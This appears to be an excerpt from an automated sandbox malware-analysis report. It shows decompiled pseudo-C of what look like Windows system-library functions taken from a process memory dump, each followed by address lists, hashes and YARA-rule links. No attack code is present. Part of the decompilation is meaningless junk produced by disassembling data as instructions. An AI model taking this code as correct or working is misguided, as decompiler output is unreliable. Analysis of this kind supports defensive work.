											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0526B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0526B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0526E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0526A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0522b171
0x0522b171
0x0522b171
0x0522b171
0x0522b171
0x0522b176
0x0522b17b
0x0522b180
0x0522b186
0x0522b18f
0x0522b198
0x0522b1a4
0x0522b1aa
0x05284802
0x05284802
0x05284805
0x0528480c
0x0528480e
0x0522b1d1
0x0522b1d3
0x0522b1de
0x0522b1de
0x05284817
0x0528481e
0x05284820
0x05284822
0x05284822
0x05284824
0x05284824
0x0528482a
0x00000000
0x00000000
0x05284835
0x0528483a
0x0528483d
0x0528483f
0x05284842
0x05284842
0x05284842
0x05284846
0x0528484c
0x0528484e
0x05284851
0x05284851
0x05284853
0x05284854
0x05284854
0x05284858
0x0528485a
0x0528485a
0x0528485d
0x0528485f
0x05284861
0x05284861
0x05284866
0x0528486b
0x0528486e
0x05284871
0x05284876
0x05284876
0x05284878
0x0528487b
0x05284884
0x05284884
0x00000000
0x0528487d
0x0528487d
0x05284882
0x05284889
0x05284889
0x0528488f
0x05284891
0x052848e0
0x052848e2
0x052848e4
0x052848e4
0x052848e7
0x052848e7
0x052848ed
0x052848f4
0x052848f6
0x05284951
0x05284951
0x05284953
0x05284953
0x05284956
0x05284956
0x05284958
0x05284959
0x05284959
0x0528495d
0x0528495d
0x0528495f
0x0528495f
0x05284965
0x05284969
0x052849ba
0x052849ba
0x052849c1
0x052849c5
0x052849cc
0x052849d4
0x052849d7
0x052849da
0x052849e4
0x052849e5
0x052849f3
0x05284a02
0x00000000
0x05284a02
0x05284972
0x05284974
0x00000000
0x00000000
0x05284976
0x05284979
0x05284982
0x05284983
0x05284984
0x0528498b
0x0528498d
0x05284991
0x05284993
0x05284999
0x0528499d
0x052849a2
0x052849a2
0x052849a2
0x05284999
0x052849ac
0x00000000
0x052849b3
0x052848f8
0x052848fe
0x00000000
0x00000000
0x00000000
0x052848fe
0x05284895
0x0528489c
0x052848ad
0x052848b2
0x052848b5
0x052848b7
0x052848ba
0x052848bc
0x052848c6
0x052848c6
0x052848cb
0x052848d1
0x052848d4
0x052848d8
0x052848d8
0x00000000
0x052848d8
0x052848be
0x052848c0
0x00000000
0x00000000
0x052848c2
0x00000000
0x00000000
0x00000000
0x052848c4
0x00000000
0x05284882
0x0528487b
0x05284904
0x05284906
0x00000000
0x00000000
0x05284908
0x0528490e
0x00000000
0x00000000
0x05284910
0x05284917
0x05284917
0x00000000
0x05284917
0x0522b1ba
0x052847f9
0x052847fc
0x00000000
0x00000000
0x00000000
0x052847fc
0x0522b1c0
0x0522b1c0
0x0522b1c3
0x0522b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 052848AD

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 8bc41a76d15e069cad90564898511852960e3b9fe96814d28a7dadb625ad8107
Instruction ID: 00897495d48e8be31a8f2d0ec4946b7260c856409b7af84579881a68c56677b6
Opcode Fuzzy Hash: 8bc41a76d15e069cad90564898511852960e3b9fe96814d28a7dadb625ad8107
Instruction Fuzzy Hash: FD51E575E2525B8BDF31EFA4C844BBEBBB1BF04718F1141A9D859AB2C1D77049418BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0524B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0524B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x531d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E05247D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E052F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E05269E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0526B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0526CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E05247D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E052F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0526AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x5318628; // 0x0
								_v68 = _t77;
								_t78 =  *0x531862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x5318628; // 0x0
							_t116 =  *0x531862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0524b94c
0x0524b956
0x0524b95c
0x0524b95e
0x0524b964
0x0524b969
0x0524b96d
0x0524b96d
0x0524b970
0x0524b974
0x0524b97a
0x0524badf
0x0524badf
0x0524bae2
0x0524bae4
0x0524bae6
0x0524baf0
0x05292cb8
0x0524baf6
0x0524baf6
0x0524baf6
0x0524bafd
0x0524bb1f
0x0524bb1f
0x0524baff
0x0524bb00
0x0524bb00
0x0524bb03
0x0524bb03
0x0524bacb
0x0524bacf
0x0524bad0
0x0524bad1
0x0524badc
0x0524badc
0x0524b980
0x0524b980
0x0524b988
0x0524b98b
0x0524b98d
0x0524b990
0x0524b993
0x0524b999
0x0524b99b
0x0524b9a1
0x0524b9a5
0x0524b9aa
0x0524b9b0
0x0524b9bb
0x0524b9c0
0x0524b9c3
0x0524b9ca
0x0524b9cc
0x0524b9cf
0x0524b9d3
0x0524b9d7
0x0524ba94
0x0524ba94
0x0524ba98
0x0524baa3
0x05292ccb
0x0524baa9
0x0524baa9
0x0524baa9
0x0524bab1
0x05292cd5
0x05292cdd
0x05292cdd
0x0524babb
0x0524babc
0x0524bac2
0x0524bac3
0x0524bac3
0x0524bac6
0x00000000
0x0524b9dd
0x0524b9dd
0x0524b9e7
0x0524b9e7
0x0524b9ec
0x0524b9ec
0x0524b9f1
0x0524b9f5
0x0524b9fa
0x0524ba00
0x0524ba0c
0x0524ba10
0x0524ba10
0x0524ba12
0x0524ba18
0x00000000
0x00000000
0x0524bb26
0x0524bb26
0x0524ba1e
0x0524ba1e
0x0524ba23
0x0524ba25
0x0524ba2c
0x0524ba30
0x0524ba35
0x0524ba35
0x0524ba41
0x0524ba46
0x0524ba4c
0x0524ba50
0x0524ba54
0x0524ba6a
0x0524ba6e
0x0524ba70
0x0524ba74
0x0524ba78
0x0524ba7a
0x0524ba7c
0x0524ba8e
0x0524ba90
0x0524ba92
0x0524bb14
0x0524bb14
0x0524bb16
0x0524bb16
0x00000000
0x0524ba7c
0x0524bb0a
0x0524bb0d
0x00000000
0x00000000
0x00000000
0x0524bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0524B9A5

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 262eb59ebd08230d8547cecef956152c958f388f35a84b49de1799011bba3431
Instruction ID: 7ecd1cdd071afce28194c3963266e3dcd68e8d4c37f4c74502fd350dee26ba04
Opcode Fuzzy Hash: 262eb59ebd08230d8547cecef956152c958f388f35a84b49de1799011bba3431
Instruction Fuzzy Hash: 39513971628351CFCB28CF28C08092ABBE6FF88610F14896EF99997354D770E844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 05252581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E05252581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t225;
				signed int _t229;
				signed int _t233;
				void* _t235;
				signed int _t241;
				signed int _t243;
				intOrPtr _t245;
				signed int _t248;
				signed int _t255;
				signed int _t258;
				signed int _t266;
				intOrPtr _t272;
				signed int _t274;
				signed int _t276;
				void* _t277;
				signed int _t278;
				unsigned int _t281;
				signed int _t285;
				signed int _t287;
				signed int _t291;
				intOrPtr _t303;
				signed int _t312;
				signed int _t314;
				signed int _t315;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t324;
				signed int _t326;
				void* _t327;
				void* _t329;

				_t324 = _t326;
				_t327 = _t326 - 0x4c;
				_v8 =  *0x531d360 ^ _t324;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t319 = 0x531b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t281 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t329 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t272 = 0x48;
				_t301 = 0 | _t329 == 0x00000000;
				_t312 = 0;
				_v37 = _t329 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t272 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t320 = 0xc0000106;
						goto L32;
					} else {
						_t319 = L05244620(_t281,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t272);
						_v52 = _t319;
						__eflags = _t319;
						if(_t319 == 0) {
							_t320 = 0xc0000017;
							goto L32;
						} else {
							 *(_t319 + 0x44) =  *(_t319 + 0x44) & 0x00000000;
							_t50 = _t319 + 0x48; // 0x48
							_t314 = _t50;
							_t301 = _v32;
							 *((intOrPtr*)(_t319 + 0x3c)) = _t272;
							_t274 = 0;
							 *((short*)(_t319 + 0x30)) = _v48;
							__eflags = _t301;
							if(_t301 != 0) {
								 *(_t319 + 0x18) = _t314;
								__eflags = _t301 - 0x5318478;
								 *_t319 = ((0 | _t301 == 0x05318478) - 0x00000001 & 0xfffffffb) + 7;
								E0526F3E0(_t314,  *((intOrPtr*)(_t301 + 4)),  *_t301 & 0x0000ffff);
								_t301 = _v32;
								_t327 = _t327 + 0xc;
								_t274 = 1;
								__eflags = _a8;
								_t314 = _t314 + (( *_t301 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t266 = E052B39F2(_t314);
									_t301 = _v32;
									_t314 = _t266;
								}
							}
							_t285 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t320 = _v68;
								__eflags = 0;
								 *((short*)(_t314 - 2)) = 0;
								goto L32;
							} else {
								_t276 = _t319 + _t274 * 4;
								_v56 = _t276;
								do {
									__eflags = _t301;
									if(_t301 != 0) {
										_t225 =  *(_v60 + _t285 * 4);
										__eflags = _t225;
										if(_t225 == 0) {
											goto L30;
										} else {
											__eflags = _t225 == 5;
											if(_t225 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t276 =  *(_v60 + _t285 * 4);
										 *(_t276 + 0x18) = _t314;
										_t229 =  *(_v60 + _t285 * 4);
										__eflags = _t229 - 8;
										if(_t229 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t229 * 4 +  &M05252959))) {
												case 0:
													__ax =  *0x5318488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0526F3E0(__edi,  *0x531848c, __ax & 0x0000ffff);
														__eax =  *0x5318488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0526F3E0(_t314, _v80, _v64);
													_t261 = _v64;
													goto L26;
												case 2:
													 *0x5318480 & 0x0000ffff = E0526F3E0(__edi,  *0x5318484,  *0x5318480 & 0x0000ffff);
													__eax =  *0x5318480 & 0x0000ffff;
													__eax = ( *0x5318480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0526F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0526F3E0(_t314, _v76, _v36);
														_t261 = _v36;
													}
													L26:
													_t327 = _t327 + 0xc;
													_t314 = _t314 + (_t261 >> 1) * 2 + 2;
													__eflags = _t314;
													L27:
													_push(0x3b);
													_pop(_t263);
													 *((short*)(_t314 - 2)) = _t263;
													goto L28;
												case 6:
													__ebx =  *0x531575c;
													__eflags = __ebx - 0x531575c;
													if(__ebx != 0x531575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0526F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x531575c;
														} while (__ebx != 0x531575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x5318478 & 0x0000ffff = E0526F3E0(__edi,  *0x531847c,  *0x5318478 & 0x0000ffff);
													__eax =  *0x5318478 & 0x0000ffff;
													__eax = ( *0x5318478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E052B39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x5316e58 & 0x0000ffff = E0526F3E0(__edi,  *0x5316e5c,  *0x5316e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x5316e58 & 0x0000ffff;
													__eax = ( *0x5316e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t285 = _v16;
													_t301 = _v32;
													L29:
													_t276 = _t276 + 4;
													__eflags = _t276;
													_v56 = _t276;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t285 = _t285 + 1;
									_v16 = _t285;
									__eflags = _t285 - _v48;
								} while (_t285 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t229 =  *(_v60 + _t312 * 4);
						if(_t229 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t229 * 4 +  &M05252935))) {
							case 0:
								__ax =  *0x5318488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t301 =  &_v64;
								_v80 = E05252E3E(0,  &_v64);
								_t272 = _t272 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x5318480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5318480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0523EEF0(0x53179a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0523EB70(__ecx, 0x53179a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t203 = _v72;
											__eflags = _t203;
											if(_t203 != 0) {
												L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t203);
											}
											_t204 = _v52;
											__eflags = _t204;
											if(_t204 != 0) {
												__eflags = _t320;
												if(_t320 < 0) {
													L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t204);
													_t204 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t281 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x5317b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0523EB70(__ecx, 0x53179a0);
										__eax = _v52;
										L36:
										_pop(_t313);
										_pop(_t321);
										__eflags = _v8 ^ _t324;
										_pop(_t273);
										return E0526B640(_t204, _t273, _v8 ^ _t324, _t301, _t313, _t321);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t268 = _v56;
								if(_v56 != 0) {
									_t301 =  &_v36;
									_t270 = E05252E3E(_t268,  &_v36);
									_t281 = _v36;
									_v76 = _t270;
								}
								if(_t281 == 0) {
									goto L44;
								} else {
									_t272 = _t272 + 2 + _t281;
								}
								goto L14;
							case 6:
								__eax =  *0x5315764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x5318478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5318478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x5316e58 & 0x0000ffff;
								__eax = ( *0x5316e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t312 = _t312 + 1;
								if(_t312 >= _v48) {
									goto L16;
								} else {
									_t301 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t233 = ((_t229 & 0x25286605) + 0x052527e0 & 0x25284605) + 0x5252605;
					ds = 0x25;
					_pop(_t277);
					 *0x5252894 =  *0x5252894 - _t233;
					 *0x25288005 =  *0x25288005 - _t327;
					_t235 = (_t233 ^ 0x0205295b) + 0x52527f6;
					_push(ds);
					 *0x25284e05 =  *0x25284e05 - _t235;
					asm("fcomp dword [ebx+0x29]");
					 *0xcccccccc =  *0xcccccccc - (_t235 + 0xa4a5011 ^ 0x0000005c);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x52fff00);
					E0527D08C(_t277, _t314, _t319);
					_v44 =  *[fs:0x18];
					_t315 = 0;
					 *_a24 = 0;
					_t278 = _a12;
					__eflags = _t278;
					if(_t278 == 0) {
						_t241 = 0xc0000100;
					} else {
						_v8 = 0;
						_t322 = 0xc0000100;
						_v52 = 0xc0000100;
						_t243 = 4;
						while(1) {
							_v40 = _t243;
							__eflags = _t243;
							if(_t243 == 0) {
								break;
							}
							_t291 = _t243 * 0xc;
							_v48 = _t291;
							__eflags = _t278 -  *((intOrPtr*)(_t291 + 0x5201664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t258 = E0526E5C0(_a8,  *((intOrPtr*)(_t291 + 0x5201668)), _t278);
									_t327 = _t327 + 0xc;
									__eflags = _t258;
									if(__eflags == 0) {
										_t322 = E052A51BE(_t278,  *((intOrPtr*)(_v48 + 0x520166c)), _a16, _t315, _t322, __eflags, _a20, _a24);
										_v52 = _t322;
										break;
									} else {
										_t243 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t243 = _t243 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t322;
						__eflags = _t322;
						if(_t322 < 0) {
							__eflags = _t322 - 0xc0000100;
							if(_t322 == 0xc0000100) {
								_t287 = _a4;
								__eflags = _t287;
								if(_t287 != 0) {
									_v36 = _t287;
									__eflags =  *_t287 - _t315;
									if( *_t287 == _t315) {
										_t322 = 0xc0000100;
										goto L76;
									} else {
										_t303 =  *((intOrPtr*)(_v44 + 0x30));
										_t245 =  *((intOrPtr*)(_t303 + 0x10));
										__eflags =  *((intOrPtr*)(_t245 + 0x48)) - _t287;
										if( *((intOrPtr*)(_t245 + 0x48)) == _t287) {
											__eflags =  *(_t303 + 0x1c);
											if( *(_t303 + 0x1c) == 0) {
												L106:
												_t322 = E05252AE4( &_v36, _a8, _t278, _a16, _a20, _a24);
												_v32 = _t322;
												__eflags = _t322 - 0xc0000100;
												if(_t322 != 0xc0000100) {
													goto L69;
												} else {
													_t315 = 1;
													_t287 = _v36;
													goto L75;
												}
											} else {
												_t248 = E05236600( *(_t303 + 0x1c));
												__eflags = _t248;
												if(_t248 != 0) {
													goto L106;
												} else {
													_t287 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t322 = E05252C50(_t287, _a8, _t278, _a16, _a20, _a24, _t315);
											L76:
											_v32 = _t322;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0523EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t322 = _a24;
									_t255 = E05252AE4( &_v36, _a8, _t278, _a16, _a20, _t322);
									_v32 = _t255;
									__eflags = _t255 - 0xc0000100;
									if(_t255 == 0xc0000100) {
										_v32 = E05252C50(_v36, _a8, _t278, _a16, _a20, _t322, 1);
									}
									_v8 = _t315;
									E05252ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t241 = _t322;
					}
					L70:
					return E0527D0D1(_t241);
				}
				L108:
			}

0x05252584
0x05252586
0x05252590
0x05252596
0x05252597
0x05252598
0x05252599
0x0525259e
0x052525a4
0x052525a9
0x052525ac
0x052525ae
0x052525b1
0x052525b2
0x052525b5
0x052525b8
0x052525bb
0x052525bc
0x052525bf
0x052525c2
0x052525c5
0x052525c6
0x052525cb
0x052525ce
0x052525d8
0x052525db
0x052525dd
0x052525de
0x052525e1
0x052525e3
0x052525e9
0x052526da
0x052526da
0x052526dd
0x052526e2
0x05295b56
0x00000000
0x052526e8
0x052526f9
0x052526fb
0x052526fe
0x05252700
0x05295b60
0x00000000
0x05252706
0x05252706
0x0525270a
0x0525270a
0x0525270d
0x05252713
0x05252716
0x05252718
0x0525271c
0x0525271e
0x05295b6c
